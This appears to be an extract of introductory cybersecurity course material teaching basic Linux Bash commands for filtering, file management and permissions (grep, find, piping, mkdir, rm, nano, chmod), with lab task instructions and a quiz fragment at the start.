How many warning messages are in the first 10 lines of the server_logs.txt file?
Two
One
Six
Three
Submit
Click Check my progress to verify that you have completed this task correctly.
Navigate to a directory and locate a file
Check my progress
Conclusion
Great work!
You now have practical experience in using basic Linux Bash shell commands to
●
●
●
●
navigate directory structures with the cd command,
display the current working directory with the pwd command,
list the contents of a directory with the ls command, and
display the contents of files with the cat and head commands.
Navigating through directories and reading file contents are fundamental skills that you’ll
often use when communicating through the shell.
Find what you need in Linux
Now that we covered: pwd, ls, and cd and are familiar with these basic commands for navigating the
Linux file system, let's look at a couple of ways to find what you need within this system. As a
security analyst, your work will likely involve filtering for the information you need. Filtering
means searching
your system for specific information that can help you solve complex problems. For example,
imagine
that your team determines a piece of malware contains a string of characters. You might be tasked
with
finding other files with the same string to determine if those files contain the same malware. Later,
we'll learn more about how you can use SQL to filter a database, but Linux is a good place to start
basic filtering. First, we'll start with grep. The grep command searches a specified file and returns
all lines in the file containing a specified string. Here's an example of this. Let's say we have a file
called updates.txt, and we're currently looking for lines that contain the word: OS. If the file is large,
it would take a long time to visually scan for this. Instead, after navigating to the directory that
contains updates.txt, we'll type the command: grep OS updates.txt into the shell. Notice how the
grep command is followed by two arguments. The first argument is the
string we're searching for; in this case, OS. The second argument is
the name of the file we're searching
through, updates.txt. When we press enter, Bash returns all lines
containing the word OS. Now let's talk about piping. Piping is a Linux command that can be used for
a
variety of purposes. In a moment, we'll focus on how it can be used
for filtering. But first, let's talk about the general idea of piping. The piping command sends
a standard output of one command as standard input into another command
for further processing. It's represented by the vertical bar character. In our context, we can refer to
this
as the pipe character. Take a moment and imagine a physical pipe. Physical pipes have two ends. On
one end, for example, water might enter the pipe from a hot water tank. Then, it travels through the
pipe and comes out on the other end in a sink. Similarly, in Linux, piping also involves redirection.
Output from one command is sent through the pipe and then is used on the other side of the pipe.
Earlier in this video, I explained how grep can be used to filter for strings of characters within a file.
Grep can also be incorporated after a pipe. Let's focus on this example. The first command, ls,
instructs the operating system to output the file and directory contents of their reports subdirectory.
But because the command is followed by the pipe, the output isn't returned to the screen. Instead,
it's sent
to the next command. As we just learned, grep searches for a specified string of characters; in this
case, it's users. But where is it searching? Since grep follows a pipe, the output of the previous
command indicates where to search. In this case, that output is a list of files and directories within
the reports subdirectory. It will return all files and directories that contain the word: users. Let's
explore this in Bash. So we can better understand how the filter works, let's first output everything
in the reports directory. If we were already in the directory, we would just need to input ls. But
since we're not, we'll also specify the path to this directory. When we press enter, the output
indicates there are seven files in the
reports directory. Because we want to return only the files that contain the word users, we'll
combine this ls command with piping and the grep command. As the output demonstrates, Linux
has been
instructed to return only files that contain the word users. The two files that don't contain this
string no longer appear. So now you have two different ways that you can filter in Linux while
working as an analyst. Navigating through files and filtering are just part of what you need to know.
Let's keep exploring the Linux command line.
Filter content in Linux
In this reading, you’ll continue exploring Linux commands, which can help you filter for the information
you need. You’ll learn a new Linux command, find, which can help you search files and directories for
specific information.
Filtering for information
You previously explored how filtering for information is an important skill for security analysts. Filtering
is selecting data that match a certain condition. For example, if you had a virus in your system that only
affected the .txt files, you could use filtering to find these files quickly. Filtering allows you to search
based on specific criteria, such as file extension or a string of text.
grep
The grep command searches a specified file and returns all lines in the file containing a specified string.
The grep command commonly takes two arguments: a specific string to search for and a specific file to
search through.
For example, entering grep OS updates.txt returns all lines containing OS in the updates.txt file. In this
example, OS is the specific string to search for, and updates.txt is the specific file to search through.
Piping
The pipe command is accessed using the pipe character (|). Piping sends the standard output of one
command as standard input to another command for further processing. As a reminder, standard output
is information returned by the OS through the shell, and standard input is information received by the
OS via the command line.
The pipe character (|) is located in various places on a keyboard. On many keyboards, it’s located on the
same key as the backslash character (\). On some keyboards, the | can look different and have a small
space through the middle of the line. If you can’t find the |, search online for its location on your
particular keyboard.
When used with grep, the pipe can help you find directories and files containing a specific word in their
names. For example, ls /home/analyst/reports | grep users returns the file and directory names in the
reports directory that contain users. Before the pipe, ls indicates to list the names of the files and
directories in reports. Then, it sends this output to the command after the pipe. In this case, grep users
returns all of the file or directory names containing users from the input it received.
Note: Piping is a general form of redirection in Linux and can be used for multiple tasks other than
filtering. You can think of piping as a general tool that you can use whenever you want the output of one
command to become the input of another command.
find
The find command searches for directories and files that meet specified criteria. There’s a wide range of
criteria that can be specified with find. For example, you can search for files and directories that
●
●
●
Contain a specific string in the name,
Are a certain file size, or
Were last modified within a certain time frame.
When using find, the first argument after find indicates where to start searching. For example, entering
find /home/analyst/projects searches for everything starting at the projects directory.
After this first argument, you need to indicate your criteria for the search. If you don’t include a specific
search criteria with your second argument, your search will likely return a lot of directories and files.
Specifying criteria involves options. Options modify the behavior of a command and commonly begin
with a hyphen (-).
-name and -iname
One key criteria analysts might use with find is to find file or directory names that contain a specific
string. The specific string you’re searching for must be entered in quotes after the -name or -iname
options. The difference between these two options is that -name is case-sensitive, and -iname is not.
For example, you might want to find all files in the projects directory that contain the word “log” in the
file name. To do this, you’d enter find /home/analyst/projects -name "*log*". You could also enter find
/home/analyst/projects -iname "*log*".
In these examples, the output would be all files in the projects directory that contain log surrounded by
zero or more characters. The "*log*" portion of the command is the search criteria that indicates to
search for the string “log”. When -name is the option, files with names that include Log or LOG, for
example, wouldn’t be returned because this option is case-sensitive. However, they would be returned
when -iname is the option.
Note: An asterisk (*) is used as a wildcard to represent zero or more unknown characters.
-mtime
Security analysts might also use find to find files or directories last modified within a certain time frame.
The -mtime option can be used for this search. For example, entering find /home/analyst/projects -mtime -
3 returns all files and directories in the projects directory that have been modified within the past three
days.
The -mtime option search is based on days, so entering -mtime +1 indicates all files or directories last
modified more than one day ago, and entering -mtime -1 indicates all files or directories last modified
less than one day ago.
Note: The option -mmin can be used instead of -mtime if you want to base the search on minutes rather
than days.
Filtering for information using Linux commands is an important skill for security analysts so that they
can customize data to fit their needs. Three key Linux commands for this are grep, piping (|), and find.
These commands can be used to navigate and filter for information in the file system.
Activity: Filter with grep
Activity overview
Previously, you learned about tools that you can use to filter information in Linux. You’re
also familiar with the basic commands to navigate the Linux file system by now.
In this lab activity, you’ll use the grep command and piping to search for files and to return
specific information from files.
As a security analyst, it’s key to know how to find the information you need. The ability to
search for specific strings can help you locate what you need more efficiently.
Scenario
In this scenario, you need to obtain information contained in server log and user data files.
You also need to find files with specific names.
Here’s how you’ll do this: First, you’ll navigate to the logs directory and return the error
messages in the server_logs.txt file. Next, you’ll navigate to the users directory and search
for files that contain a specific string in their names. Finally, you’ll search for information
contained in user files.
With that in mind, you’re ready to practice what you've learned.
Note: The lab starts with your user account, called analyst, already logged in to a Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
Start your lab
Before you begin, you can review the instructions for using the Qwiklabs platform under
the Resources tab in Coursera.
If you haven't already done so, click Start Lab. This brings up the terminal so that you can
begin completing the tasks!
When you have completed all the tasks, refer to the End your Lab section that follows the
tasks for information on how to end your lab.
Task 1. Search for error messages in a log file
In this task, you must navigate to the /home/analyst/logs directory and report on the error
messages in the server_logs.txt file. You’ll do this by using grep to search the file and output
only the entries that are for errors.
1. Navigate to the /home/analyst/logs directory.
2. Use grep to filter the server_logs.txt file, and return all lines containing the text
string error.
Note: If you enter a command incorrectly and it fails to return to the command-line prompt,
you can press CTRL+C to stop the process and force the shell to return to the commandline prompt.
Task 2. Find files containing specific strings
In this task, you must navigate to the /home/analyst/reports/users directory and use the
correct Linux commands and arguments to search for user data files that contain a specific
string in their names.
1. Navigate to the /home/analyst/reports/users directory.
2. Using the pipe character (|), pipe the output of the ls command to the grep command
to list only the files containing the string Q1 in their names.
Task 3. Search more file contents
In this task, you must search for information contained in user files and report on users
that were added and deleted from the system.
1. Display the files in the /home/analyst/reports/users directory.
2. Search the Q2_deleted_users.txt file for the username jhill.
3. Search the Q4_added_users.txt file to list the users who were added to the Human
Resources department.
Create and modify directories and files
Let's make some branches! What do I mean by that? Well, in a previous video, we discussed
root
directories and how other subdirectories branch off of the root directory. Let's think again
about the file directory
system as a tree. The subdirectories are
the branches of the tree. They're all connected
from the same root but can grow to make
a complex tree. In this video, we'll create directories and files and
learn how to modify them. When it comes to
working with data in security, organization is key. If we know where
information is located, it makes it easier to detect issues and keep
information safe. In a previous video, we've already discussed
navigating between directories, but let's take a moment to examine directories
more closely. It's possible you're
familiar with the concept of folders for
organizing information. In Linux, we have directories. Directories help organize
files and subdirectories. For example, within a
directory for reports, an analyst may need to
create two subdirectories: one for drafts and one
for final reports. Now that we know why
we need directories, let's take a look at some essential
Linux commands for managing directories and files. First, let's take note of commands for
creating and
removing directories. The mkdir command
creates a new directory. In contrast, rmdir removes
or deletes a directory. A helpful feature
of this command is its built-in warning
that lets you know a directory is not empty. This saves you from
accidentally deleting files. Next, you'll use other commands for creating
and removing files. The touch command creates a new file, and then the rm command
removes or deletes a file. And last, we have our commands for copying and moving files or
directories. The mv command moves a file or directory to new location, and cp copies a file
or
directory into a new location. Now, we're ready to try out these commands. First, let's use
the pwd command, and then let's display the names of the files and directories in the
analyst
directory with the ls command. Imagine that we no longer need the old reports directory
that appears among the file contents. Let's take a look at how to remove it. We input the
rmdir command and follow it with the name of the directory we want to remove:
oldreports. We can use the ls command to confirm that old reports has been deleted and no
longer appears
among the contents. Now, let's make another change. We want a new directory
for drafts of reports. We need to use the command: mkdir and specify a name for
this directory: drafts. If we input ls again, we'll notice the new directory drafts included
among the contents of the analyst directory. Let's change into this new directory by
entering: cd drafts. If we run ls, it doesn't return any output, indicating that this directory is
currently empty. But next, we'll add some files to it. Let's say we want to draft new reports
on recently installed
email and OS patches. To create these files, we input: touch email_patches.txt and then:
touch OS_patches.txt. Running ls indicates that these files are now in the drafts directory.
What if we realize that we only need a new report on OS patches and we want to delete the
email patches report? To do this, we input the rm command and specify the file to delete as:
email_patches.txt. Running ls confirms that it's been deleted. Now, let's focus on our
commands for moving and copying. We realized that we have a file called email policy in
the reports folder that is currently in draft format. We want to move it into the newly
created drafts folder. To do this, we need to change into the directory that currently has
that file. Running ls in that directory indicates that it contains several files, including
email_policy.txt. Then to move that file, we'll enter the mv command followed by two
arguments. The first argument after mv identifies the file to be moved. The second argument
indicates where to move it. If we change directories into drafts and then display its
contents, we'll notice that the
email policy file has been moved to this directory. We'll change back into reports.
Displaying the file contents confirms that email policy is no longer there. Okay, one more
thing.
vulnerabilities.txt is a file that we want to keep in the reports directory. But since it affects
an upcoming project, we also want to copy it into the project's directory. Since we're
already in the directory that has this file, we'll use the cp command to copy it into the
projects directory. Notice that the first argument indicates which file to copy, and the
second argument provides the path to the directory that it will be copied into. When we
press Enter, this copies the
vulnerabilities file into the projects directory while also leaving the original
within reports. Isn't it cool what we can do with these commands? Now, let's focus on one
more concept related to modifying files. In addition to using commands, you can also use
applications to help you edit files. As a security analyst, file editors are often necessary for
your daily tasks, like writing or editing reports. A popular file editor is nano. It's good for
beginners. You can access this tool through the nano command. Let's get familiar with nano
together. We'll add a title to our new draft report: OS_patches.txt. First, we change into the
directory
containing that file, then we input nano followed by the name
of the file we want to edit: OS_patches.txt. This brings up the nano file
editor with that file open. For now, we'll just enter the title OS Patches by
typing this into the editor. We need to save this before returning to the command
line, and to do so, we press Ctrl+O and then enter to save it
with the current file name. Then to exit, we
press Ctrl+X.
Manage directories and files
Previously, you explored how to manage the file system using Linux commands. The following
commands were introduced: mkdir, rmdir, touch, rm, mv, and cp. In this reading, you’ll review these
commands, the nano text editor, and learn another way to write to files.
Creating and modifying directories
mkdir
The mkdir command creates a new directory. Like all the commands presented in this reading, you can
either provide the new directory as the absolute file path, which starts from the root, or as a relative file
path, which starts from your current directory.
For example, if you want to create a new directory called network in your /home/analyst/logs directory,
you can enter mkdir /home/analyst/logs/network to create this new directory. If you’re already in the
/home/analyst/logs directory, you can also create this new directory by entering mkdir network.
Pro Tip: You can use the ls command to confirm the new directory was added.
rmdir
The rmdir command removes, or deletes, a directory. For example, entering rmdir
/home/analyst/logs/network would remove this empty directory from the file system.
Note: The rmdir command cannot delete directories with files or subdirectories inside. For example,
entering rmdir /home/analyst returns an error message.
Creating and modifying files
touch and rm
The touch command creates a new file. This file won’t have any content inside. If your current directory
is /home/analyst/reports, entering touch permissions.txt creates a new file in the reports subdirectory
called permissions.txt.
The rm command removes, or deletes, a file. This command should be used carefully because it’s not
easy to recover files deleted with rm. To remove the permissions file you just created, enter rm
permissions.txt.
Pro Tip: You can verify that permissions.txt was successfully created or removed by entering ls.
mv and cp
You can also use mv and cp when working with files. The mv command moves a file or directory to a new
location, and the cp command copies a file or directory into a new location. The first argument after mv
or cp is the file or directory you want to move or copy, and the second argument is the location you want
to move or copy it to.
To move permissions.txt into the logs subdirectory, enter mv permissions.txt /home/analyst/logs. Moving a
file removes the file from its original location. However, copying a file doesn’t remove it from its original
location. To copy permissions.txt into the logs subdirectory while also keeping it in its original location,
enter cp permissions.txt /home/analyst/logs.
Note: The mv command can also be used to rename files. To rename a file, pass the new name in as the
second argument instead of the new location. For example, entering mv permissions.txt perm.txt renames
the permissions.txt file to perm.txt.
nano text editor
nano is a command-line file editor that is available by default in many Linux distributions. Many
beginners find it easy to use, and it’s widely used in the security profession. You can perform multiple
basic tasks in nano, such as creating new files and modifying file contents.
To open an existing file in nano from the directory that contains it, enter nano followed by the file name.
For example, entering nano permissions.txt from the /home/analyst/reports directory opens a new nano
editing window with the permissions.txt file open for editing. You can also provide the absolute file path
to the file if you’re not in the directory that contains it.
You can also create a new file in nano by entering nano followed by a new file name. For example,
entering nano authorized_users.txt from the /home/analyst/reports directory creates the
authorized_users.txt file within that directory and opens it in a new nano editing window.
Since there isn't an auto-saving feature in nano, it’s important to save your work before exiting. To save
a file in nano, use the keyboard shortcut Ctrl + O. You’ll be prompted to confirm the file name before
saving. To exit out of nano, use the keyboard shortcut Ctrl + X.
Note: Vim and Emacs are also popular command-line text editors.
Standard output redirection
There’s an additional way you can write to files. Previously, you learned about standard input and
standard output. Standard input is information received by the OS via the command line, and standard
output is information returned by the OS through the shell.
You’ve also learned about piping. Piping sends the standard output of one command as standard input to
another command for further processing. It uses the pipe character (|).
In addition to the pipe (|), you can also use the right angle bracket (>) and double right angle bracket
(>>) operators to redirect standard output.
When used with echo, the > and >> operators can be used to send the output of echo to a specified file
rather than the screen. The difference between the two is that > overwrites your existing file, and >>
adds your content to the end of the existing file instead of overwriting it. The > operator should be used
carefully, because it’s not easy to recover overwritten files.
When you’re inside the directory containing the permissions.txt file, entering echo "last updated date" >>
permissions.txt adds the string “last updated date” to the file contents. Entering echo "time" >
permissions.txt after this command overwrites the entire file contents of permissions.txt with the string
“time”.
Note: Both the > and >> operators will create a new file if one doesn’t already exist with your specified
name.
Knowing how to manage the file system in Linux is an important skill for security analysts. Useful
commands for this include: mkdir, rmdir, touch, rm, mv, and cp. When security analysts need to write to
files, they can use the nano text editor, or the > and >> operators.
Activity overview – Manage Files with Linux Commands
In this lab activity, you’ll use Linux commands to modify a directory structure and the files
it contains.
You’ll also use the nano text editor to add text to a file.
You previously learned that directories help you organize subdirectories and files in Linux.
As a security analyst, creating, removing, and editing directories and files are core tasks
you’ll need to perform to help you to manage data.
When data is well organized, you can more easily detect issues and keep data safe.
With that in mind, you’re now ready to practice what you've learned.
Scenario
In this scenario, you need to ensure that the /home/analyst directory is properly organized.
You have to make a few changes to the /home/analyst directory and the files it contains.
You also have to edit a file to record the changes or updates you make to the directory.
Note: The lab starts with your user account, called analyst, already logged in to a Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
When you start, the /home/analyst directory contains the following subdirectories and
files:
home
└── analyst
├── notes
│ ├── Q3patches.txt
│ └── tempnotes.txt
├── reports
│ ├── Q1patches.txt
│ └── Q2patches.txt
└── temp
You need to modify the /home/analyst directory to the following directory and file
structure:
home
└── analyst
├── logs
├── notes
│ └── tasks.txt
└── reports
├── Q1patches.txt
└── Q2patches.txt
└── Q3patches.txt
Here’s how you’ll do this: First, you’ll create a new subdirectory called logs in
the /home/analyst directory. Next, you’ll remove the temp subdirectory. Then, you’ll move
the Q3patches.txt file to the reports subdirectory and delete the tempnotes.txt file. Finally,
you’ll create a new .txt file called tasks in the notes subdirectory and add a note to the file
describing the tasks you've performed.
You’ll need to use the commands learned in the video lesson to complete these steps.
This might sound like quite a few tasks to perform, but you’ll be guided on how to do this.
Task 1. Create a new directory
First, you must create a dedicated subdirectory called logs, which will be used to store all
future log files.
1. Create a new subdirectory called logs in the /home/analyst directory.
2. List the contents of the /home/analyst directory to confirm that you’ve successfully
created the new logs subdirectory.
The output should list the original three directories and the new logs subdirectory:
logs notes reports temp
Task 2. Remove a directory
Next, you must remove the temp directory, as you’ll no longer be placing items in it.
1. Remove the /home/analyst/temp directory.
2. List the contents of the /home/analyst directory to confirm that you have removed
the temp subdirectory.
The temp directory should no longer be listed:
logs notes reports
Task 3. Move a file
The Q3patches.txt file contains notes taken on third-quarter patches and is now in the
correct reporting format.
You must move the Q3patches.txt file from the notes directory to the reports directory.
1. Navigate to the /home/analyst/notes directory.
2. Move the Q3patches.txt file from the /home/analyst/notes directory to
the /home/analyst/reports directory.
3. List the contents of the /home/analyst/reports directory to confirm that you have
moved the file successfully.
When you list the contents of the reports directory, it should show that three quarterly
report files are now in the reports directory:
Q1patches.txt Q2patches.txt Q3patches.txt
Task 4. Remove a file
Next, you must delete an unused file called tempnotes.txt from
the /home/analyst/notes directory.
1. Remove the tempnotes.txt file from the /home/analyst/notes directory.
2. List the contents of the /home/analyst/notes directory to confirm that you’ve
removed the file successfully.
No files should be listed in the notes directory.
Task 5. Create a new file
Now, you must create a file named tasks.txt in the /home/analyst/notes directory that you’ll
use to document completed tasks.
1. Use the touch command to create an empty file called tasks.txt in
the /home/analyst/notes directory.
2. List the contents of the /home/analyst/notes directory to confirm that you have
created a new file.
A file called tasks.txt should now exist in the notes directory:
tasks.txt
Task 6. Edit a file
Finally, you must use the nano text editor to edit the tasks.txt file and add a note describing
the tasks you’ve completed.
1. Using the nano text editor, open the tasks.txt file that is located in
the /home/analyst/notes directory.
Note: This action changes the shell from the normal Bash interface to the nano text editor
interface.
2. Copy and paste the following text into the text input area of the nano editor:
Completed tasks
1. Managed file structure in /home/analyst
Copied!
content_copy
3. Press CTRL+X to exit the nano text editor.
This triggers a prompt asking Save modified bufferer?
4. Press Y to confirm that you want to save the new data to your file. (Answering "no"
will discard changes.)
5. Press ENTER to confirm that File Name to Write is tasks.txt.
Note: The recommended sequence of commands for saving a file with the nano text
editor is to use CTRL+O to tell nano to save the file and then use CTRL+X to exit
immediately.
In this web-based lab environment, the CTRL+O command is intercepted by your
web browser and is interpreted as a request to save the web page. The sequence
used here is a commonly used alternative that achieves the same end result.
6. Use the clear command to clear the Bash shell window and remove any traces of the
nano text input area.
Note: Most Bash shells typically handle the screen cleanup after you exit nano. In this lab
environment, nano sometimes leaves some text clutter around the edges of the screen that
the clear command cleans up for you.
7. Display the contents of the tasks.txt file to confirm that it contains the updated task
details.
This file should now contain the contents of the tasks.txt file that you added and saved in
previous steps:
Completed tasks
1. Managed file structure in /home/analyst
Authenticate and Authorize Users
Hi there. It's great
to have you back! Let's continue to learn
more about how to work in Linux as a
security analyst. In this video, we'll explore file and directory
permissions. We'll learn how Linux
represents permissions and how you can check
for the permissions associated with files
and directories. Permissions are the type of access granted for a
file or directory. Permissions are related
to authorization. Authorization is the concept of granting access to specific
resources in a system. Authorization allows you to limit access to specified
files or directories. A good rule to follow is that data access is on a
need-to-know basis. You can imagine the security risk it would impose if anyone could access or
modify anything they wanted to on a system. There are three types
of permissions in Linux that an authorized user can have. The first type of
permission is read. On a file, read permissions means contents on the
file can be read. On a directory, this permission means you can read all files in that directory. Next
are write permissions. Write permissions on a file allow modifications of
contents of the file. On a directory, write permissions indicate that new files can be created
in that directory. Finally, there are also execute permissions. Execute permissions on files mean that
the file can be executed if it's an executable file. Execute permissions on directories allow users to
enter into a directory and access its files. Permissions are granted for three different types of
owners. The first type is the user. The user is the owner of the file. When you create a file, you
become the
owner of the file, but the ownership can be changed. Group is the next type. Every user is a part
of a certain group. A group consists of several users, and this is one way to manage a multi-user
environment. Finally, there is other. Other can be considered all other users on the system.
Basically, anyone else with access to the system belongs to this group. In Linux, file permissions are
represented with a 10-character string. For a directory with full permissions for the user group, this
string would be: drwxrwxrwx. Let's examine what this means more closely. The first character
indicates the file type. As shown in this example, d is used to indicate it is a directory. If this
character contains a hyphen instead, it would be a regular file. The second, third, and fourth
characters indicate the permissions for the user. In this example, r indicates the user has read
permissions, w indicates the user has write permissions, and x indicates the user has execute
permissions. If one of these permissions was missing, there would be a hyphen instead of the letter.
In the same way, the fifth, sixth, and seventh characters indicate permissions for the next owner
type group. As it shows here, the type group also has read, write, and execute permissions. There
are no hyphens to indicate that any of these permissions haven't been granted. Finally, the eighth
through tenth characters indicate permissions for the last owner type: other. They also have read,
write, and execute permissions in this example. Ensuring files and directories are set with their
appropriate access permissions is critical to protecting sensitive files and maintaining the overall
security of a system. For example, payroll departments handle sensitive information. If someone
outside of the payroll group could read this file, this would be a privacy concern. Another example
is when the user, the group, and other can all write to a file. This type of file is considered
a world-writable file. World-writable files can pose significant security risks. So how do we check
permissions?
First, we need to understand what options are. Options modify the behavior of the command. The
options for a command can be a single letter or a full word. Checking permissions involves adding
options to the ls command. First, ls -l displays permissions to files and directories. You might also
want to display hidden files and identify their permissions. Hidden files, which begin with a period
before their name, don't normally appear when you use ls to display file contents. Entering ls -a
displays hidden files. Then you can combine these two options to do both. Entering ls -la displays
permissions to files and directories, including hidden files. Let's get into Bash and try out these
options. Right now, we're in the project subdirectory. First, let's use the ls command to display its
contents. The output displays the files in this directory, but we don't know anything
about their permissions. By using ls -l instead, we get expanded information on these files. Let's do
this. The file names are now on the right side of each row. The first piece of
information in each row shows the permissions in the format that we
discussed earlier. Since these are all files and not directories, notice how the first
character is a hyphen. Let's focus on one specific
file: project1.txt. The second through fourth
characters of its permissions show us the user has both read and
write permissions but lacks execute permissions. In both the fifth through seventh characters and
eighth
through tenth characters, the sequence is r--. This means group and other
have only read privileges. After the permissions, ls -l
first displays the username. Here, that's us, analyst. Next comes the group name; in our case, the
security group. Now let's use ls -a The output includes
two more files—hidden files with the names: .hidden1.txt and .hidden2.txt Finally, we can also use
ls -la to show the
permissions for all files, including these hidden files. I thought that was pretty
interesting. Did you? You now know a little more about file permissions and ownership. This will be
helpful when working in security because monitoring and setting correct permissions is essential
for
protecting information.
Change Permissions
Hi there! In the previous video, you learned how to check permissions for a user. In this video,
we're going to learn about changing permissions. When working as a security analyst, there may be
many reasons to change permissions for a user. A user may have changed departments or been
assigned to a
different work group. A user might simply no longer be working on a project that requires certain
permissions. These changes are necessary in order to protect system files from being accidentally
or deliberately altered or deleted. Let's explore a related command that helps control this access. In
this video, we'll learn about chmod. chmod changes permissions on files and directories. The
command chmod stands for change mode. There are two modes for changing permissions, but we'll
focus on symbolic. The best way to learn about how chmod works is through an example. I know
this has a lot of details, but we'll break this down. Also, please keep in mind that, like many Linux
commands, you don't have to memorize the information and can always find a reference. With
chmod, you need to identify which file or directory you want to adjust permissions for. This is the
final argument, in this case, a file named: access.txt. The first argument, added directly after the
chmod command, indicates how to change permissions. Right now, this might seem hard to
interpret, but soon we'll understand why this is called symbolic mode. Previously, we learned about
the three types of owners: user, group, and other. To identify these with chmod, we use u to
represent the user, g to represent the group, and o to represent other. In this example, g indicates
we will make some changes to group permissions, and o to permissions for other. These owner
types are separated by a comma in this argument. But do we want to add or take away permissions?
Well, for this, we use mathematical operators. So, the plus sign after g means we want to add
permissions for group. The minus sign after o means we want to take them away from other. And
the last question is: what kind of changes? We've already learned that r represents read
permissions, w represents write permissions, and x represents execute permissions. So in this case,
the w indicates that we're adding write permissions to the group, and r indicates that we are taking
away read permissions from other. This is still very complex. But now that we've broken it down,
perhaps it doesn't seem quite so much like a foreign language. And remember, you don't have to
memorize this all. Let's give this new command a try. We'll start out in the logs sub-directory. If we
use the ls -l command, it will output the permissions for the file. It shows the permissions for the
only file in this directory: access.txt. Previously, we learned how to read these permissions. The
second through fourth characters indicate that the user has read and write permissions. The fifth
through seventh characters show the group only has read permissions. And the eighth to tenth
characters show that other only has read permissions. We need to adjust these permissions. We
want to ensure analysts in the security group
have write permission, but takeaway read permissions from the owner-type other, so we add write
permissions for group and remove read permissions for other. Let's run ls -l again. This shows a
change in the permissions for access.txt. Notice how in the middle segment of permissions for the
group, w has been added to give write permissions. And another change is that the r has been
removed
in the last segment, indicating that read permissions for other have been removed. As mentioned
earlier, these hyphens indicate a lack of permissions. Now, other is lacking
all permissions. Though it requires practice, working in Linux becomes
more natural with time.
Permission commands
Previously, you explored file permissions and the commands that you can use to display and change
them. In this reading, you’ll review these concepts and also focus on an example of how these
commands work together when putting the principle of least privilege into practice.
Reading permissions
In Linux, permissions are represented with a 10-character string. Permissions include:
●
●
●
read: for files, this is the ability to read the file contents; for directories, this is the ability to read
all contents in the directory including both files and subdirectories
write: for files, this is the ability to make modifications on the file contents; for directories, this is
the ability to create new files in the directory
execute: for files, this is the ability to execute the file if it’s a program; for directories, this is the
ability to enter the directory and access its files
These permissions are given to these types of owners:
●
●
●
user: the owner of the file
group: a larger group that the owner is a part of
other: all other users on the system
Each character in the 10-character string conveys different information about these permissions. The
following table describes the purpose of each character:
Character
Example
1st
drwxrwxrwx
2nd
drwxrwxrwx
3rd
drwxrwxrwx
4th
drwxrwxrwx
5th
drwxrwxrwx
6th
drwxrwxrwx
7th
drwxrwxrwx
8th
drwxrwxrwx
9th
drwxrwxrwx
10th
drwxrwxrwx
Meaning
file type
d for directory
- for a regular file
read permissions for the user
●
●
r if the user has read permissions
- if the user lacks read permissions
write permissions for the user
●
●
w if the user has write permissions
- if the user lacks write permissions
execute permissions for the user
●
●
x if the user has execute permissions
- if the user lacks execute permissions
read permissions for the group
●
●
r if the group has read permissions
- if the group lacks read permissions
write permissions for the group
●
●
w if the group has write permissions
- if the group lacks write permissions
execute permissions for the group
●
●
x if the group has execute permissions
- if the group lacks execute permissions
read permissions for other
●
●
r if the other owner type has read permissions
- if the other owner type lacks read permissions
write permissions for other
●
●
w if the other owner type has write permissions
- if the other owner type lacks write permissions
execute permissions for other
●
●
●
●
x if the other owner type has execute permissions
- if the other owner type lacks execute permissions
Exploring existing permissions
You can use the ls command to investigate who has permissions on files and directories. Previously, you
learned that ls displays the names of files in directories in the current working directory.
There are additional options you can add to the ls command to make your command more specific. Some
of these options provide details about permissions. Here are a few important ls options for security
analysts:
●
●
ls -a: Displays hidden files. Hidden files start with a period (.) at the beginning.
ls -l: Displays permissions to files and directories. Also displays other additional information,
●
including owner name, group, file size, and the time of last modification.
ls -la: Displays permissions to files and directories, including hidden files. This is a combination
of the other two options.
Changing permissions
The principle of least privilege is the concept of granting only the minimal access and authorization
required to complete a task or function. In other words, users should not have privileges that are beyond
what is necessary. Not following the principle of least privilege can create security risks.
The chmod command can help you manage this authorization. The chmod command changes
permissions on files and directories.
Using chmod
The chmod command requires two arguments. The first argument indicates how to change permissions,
and the second argument indicates the file or directory that you want to change permissions for. For
example, the following command would add all permissions to login_sessions.txt:
chmod u+rwx,g+rwx,o+rwx login_sessions.txt
If you wanted to take all the permissions away, you could use
chmod u-rwx,g-rwx,o-rwx login_sessions.txt
Another way to assign these permissions is to use the equals sign (=) in this first argument. Using =
with chmod sets, or assigns, the permissions exactly as specified. For example, the following command
would set read permissions for login_sessions.txt for user, group, and other:
chmod u=r,g=r,o=r login_sessions.txt
This command overwrites existing permissions. For instance, if the user previously had write
permissions, these write permissions are removed after you specify only read permissions with =.
The following table reviews how each character is used within the first argument of chmod:
Character
u
g
o
Description
indicates changes will be made to user permissions
indicates changes will be made to group permissions
indicates changes will be made to other permissions
Character
+
=
Description
adds permissions to the user, group, or other
removes permissions from the user, group, or other
assigns permissions for the user, group, or other
Note: When there are permission changes to more than one owner type, commas are needed to separate
changes for each owner type. You should not add spaces after those commas.
The principle of least privilege in action
As a security analyst, you may encounter a situation like this one: There’s a file called bonuses.txt within
a compensation directory. The owner of this file is a member of the Human Resources department with
a username of hrrep1. It has been decided that hrrep1 needs access to this file. But, since this file contains
confidential information, no one else in the hr group needs access.
You run ls -l to check the permissions of files in the compensation directory and discover that the
permissions for bonuses.txt are -rw-rw----. The group owner type has read and write permissions that do
not align with the principle of least privilege.
To remedy the situation, you input chmod g-rw bonuses.txt. Now, only the user who needs to access this
file to carry out their job responsibilities can access this file.
Key takeaways
Managing directory and file permissions may be a part of your work as a security analyst. Using ls with
the -l and -la options allows you to investigate directory and file permissions. Using chmod allows you to
change user permissions and ensure they are aligned with the principle of least privilege.
Activity: Manage Authorization
Activity overview
In this lab activity, you’ll use Linux commands to configure authorization.
Authorization is the concept of granting access to specific resources in a system. It's
important because without authorization any user could access and modify all files
belonging to other users or system files. This would certainly be a security risk.
In Linux, file and directory permissions are used to specify who has access to specific files
and directories. You’ll explore file and directory permissions and change the ownership of a
file and a directory to limit who can access them.
As a security analyst, setting appropriate access permissions is critical to protecting
sensitive information and maintaining the overall security of a system.
Scenario
In this scenario, you must examine and manage the permissions on the files in
the /home/researcher2/projects directory for the researcher2 user.
The researcher2 user is part of the research_team group.
You must check the permissions for all files in the directory, including any hidden files, to
make sure that permissions align with the authorization that should be given. When it
doesn't, you must change the permissions.
Here’s how you’ll do this task: First, you’ll check the user and group permissions for all files
in the projects directory. Next, you’ll check whether any files have incorrect permissions
and change the permissions as needed. Finally, you’ll check the permissions of
the /home/researcher2/projects/drafts directory and modify these permissions to remove
any unauthorized access.
Note: The lab starts with your user account, called researcher2, already logged in to the Bash shell.
This means you can start with the tasks as soon as you click the Start Lab button.
Task 1. Check file and directory details
In this task, you must explore the permissions of the projects directory and the files it
contains. The lab starts with /home/researcher2 as the current working directory. This is
because you're changing permissions for files and directories belonging to
the researcher2 user.
